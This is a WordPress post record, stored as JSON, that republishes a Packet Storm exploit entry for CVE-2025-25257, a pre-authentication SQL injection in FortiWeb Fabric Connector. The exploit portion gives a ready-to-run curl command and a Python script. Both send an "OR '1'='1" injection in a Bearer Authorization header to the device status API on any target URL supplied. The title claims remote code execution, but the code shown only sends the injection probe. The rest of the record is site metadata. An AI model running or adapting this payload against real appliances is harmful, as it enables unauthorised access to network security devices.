{"id":20370,"date":"2025-10-06T11:34:46","date_gmt":"2025-10-06T11:34:46","guid":{"rendered":"http:\/\/localhost\/?p=20370"},"modified":"2025-10-06T11:34:46","modified_gmt":"2025-10-06T11:34:46","slug":"fortiweb-fabric-connector-76x-sql-injection","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=20370","title":{"rendered":"\ud83d\udcc4 FortiWeb Fabric Connector 7.6.x SQL Injection_PACKETSTORM:210193"},"content":{"rendered":"

{“lastseen”:”2025-10-06T16:16:07″,”description”:”FortiWeb………………………………………”,”published”:”2025-10-06T00:00:00″,”modified”:”2025-10-06T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 FortiWeb Fabric Connector 7.6.x SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:210193″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-25257″],”sourceData”:”# Exploit Title: FortiWeb Fabric Connector 7.6.x – Pre-authentication SQL\\n Injection to Remote Code Execution\\n # Date: 2025-10-05\\n # Exploit Author: Milad Karimi (Ex3ptionaL)\\n # Contact: miladgrayhat@gmail.com\\n # Zone-H: www.zone-h.org\/archive\/notifier=Ex3ptionaL\\n # Tested on: Win, Ubuntu\\n # CVE : CVE-2025-25257\\n \\n Overview\\n \\n CVE-2025-25257 is a pre-authentication SQL Injection vulnerability in\\n Fortinet FortiWeb Fabric Connector versions 7.0 through 7.6.x.\\n This flaw allows attackers to inject malicious SQL commands into the\\n vulnerable API endpoint, potentially leading to Remote Code Execution (RCE).\\n \\n \\n PoC\\n \\n curl -k -H \\”Authorization: Bearer aaa’ OR ‘1’=’1\\” \\\\\\n https:\/\/\\u003cfortiweb-ip\\u003e\/api\/fabric\/device\/status\\n \\n PoC Python\\n \\n import requests\\n \\n def test_sqli(base_url):\\n url = f\\”{base_url}\/api\/fabric\/device\/status\\”\\n headers = {\\n \\”Authorization\\”: \\”Bearer aaa’ OR ‘1’=’1\\”\\n }\\n try:\\n response = requests.get(url, headers=headers, verify=False,\\n timeout=10)\\n print(f\\”Status code: {response.status_code}\\”)\\n print(\\”Response body:\\”)\\n print(response.text)\\n except Exception as e:\\n print(f\\”Error: {e}\\”)\\n \\n if __name__ == \\”__main__\\”:\\n import argparse\\n parser = argparse.ArgumentParser(description=\\”PoC SQLi By Ex3ptionaL\\n CVE-2025-25257 FortiWeb\\”)\\n parser.add_argument(\\”base_url\\”, help=\\”Base URL of FortiWeb (ex:\\n https:\/\/10.0.0.5)\\”)\\n args = parser.parse_args()\\n test_sqli(args.base_url)\\n # python3 src\/poc.py https:\/\/10.0.0.5″,”sourceHref”:”https:\/\/packetstorm.news\/download\/210193″,”cvss”:{“score”:9.8,”severity”:”CRITICAL”,”vector”:”CVSS:3.1\/AV:N\/AC:L\/PR:N\/UI:N\/S:U\/C:H\/I:H\/A:H”,”version”:”3.1″},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/packetstorm.news\/files\/id\/210193\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"

{“lastseen”:”2025-10-06T16:16:07″,”description”:”FortiWeb………………………………………”,”published”:”2025-10-06T00:00:00″,”modified”:”2025-10-06T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 FortiWeb Fabric Connector 7.6.x SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:210193″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-25257″],”sourceData”:”# Exploit Title: FortiWeb Fabric Connector 7.6.x – Pre-authentication SQL\\n Injection to Remote Code Execution\\n # Date: 2025-10-05\\n #…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[9,6,8,35,12,13,53,7,11,5],"class_list":["post-20370","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-critical","tag-cve","tag-cvss","tag-cvss-98","tag-exploit","tag-news","tag-packetstorm","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n\ud83d\udcc4 FortiWeb Fabric Connector 7.6.x SQL Injection_PACKETSTORM:210193 - zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=20370\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"\ud83d\udcc4 FortiWeb Fabric Connector 7.6.x SQL Injection_PACKETSTORM:210193 - zero redgem\" \/>\n<meta property=\"og:description\" content=\"{“lastseen”:”2025-10-06T16:16:07″,”description”:”FortiWeb………………………………………”,”published”:”2025-10-06T00:00:00″,”modified”:”2025-10-06T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 FortiWeb Fabric Connector 7.6.x SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:210193″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-25257″],”sourceData”:”# Exploit Title: FortiWeb Fabric Connector 7.6.x – Pre-authentication SQLn Injection to Remote Code Executionn # Date: 2025-10-05n #...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=20370\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-10-06T11:34:46+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"2 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=20370#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=20370\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"\ud83d\udcc4 FortiWeb Fabric Connector 7.6.x SQL Injection_PACKETSTORM:210193\",\"datePublished\":\"2025-10-06T11:34:46+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=20370\"},\"wordCount\":364,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CRITICAL\",\"CVE\",\"CVSS\",\"CVSS-9.8\",\"exploit\",\"news\",\"packetstorm\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=20370#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=20370\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=20370\",\"name\":\"\ud83d\udcc4 FortiWeb Fabric Connector 7.6.x SQL Injection_PACKETSTORM:210193 - zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-10-06T11:34:46+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=20370#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=20370\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=20370#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\ud83d\udcc4 FortiWeb Fabric Connector 7.6.x SQL Injection_PACKETSTORM:210193\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"\ud83d\udcc4 FortiWeb Fabric Connector 7.6.x SQL Injection_PACKETSTORM:210193 - zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=20370","og_locale":"en_US","og_type":"article","og_title":"\ud83d\udcc4 FortiWeb Fabric Connector 7.6.x SQL Injection_PACKETSTORM:210193 - zero redgem","og_description":"{“lastseen”:”2025-10-06T16:16:07″,”description”:”FortiWeb………………………………………”,”published”:”2025-10-06T00:00:00″,”modified”:”2025-10-06T00:00:00″,”type”:”packetstorm”,”title”:”\ud83d\udcc4 FortiWeb Fabric Connector 7.6.x SQL Injection”,”source”:””,”references”:””,”id”:”PACKETSTORM:210193″,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[“CVE-2025-25257″],”sourceData”:”# Exploit Title: FortiWeb Fabric Connector 7.6.x – Pre-authentication SQLn Injection to Remote Code Executionn # Date: 2025-10-05n #...","og_url":"https:\/\/zero.redgem.net\/?p=20370","og_site_name":"zero redgem","article_published_time":"2025-10-06T11:34:46+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"2 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=20370#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=20370"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"\ud83d\udcc4 FortiWeb Fabric Connector 7.6.x SQL Injection_PACKETSTORM:210193","datePublished":"2025-10-06T11:34:46+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=20370"},"wordCount":364,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CRITICAL","CVE","CVSS","CVSS-9.8","exploit","news","packetstorm","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=20370#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=20370","url":"https:\/\/zero.redgem.net\/?p=20370","name":"\ud83d\udcc4 FortiWeb Fabric Connector 7.6.x SQL Injection_PACKETSTORM:210193 - zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-10-06T11:34:46+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=20370#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=20370"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=20370#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"\ud83d\udcc4 FortiWeb Fabric Connector 7.6.x SQL Injection_PACKETSTORM:210193"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/20370","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20370"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/20370\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20370"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20370"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20370"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}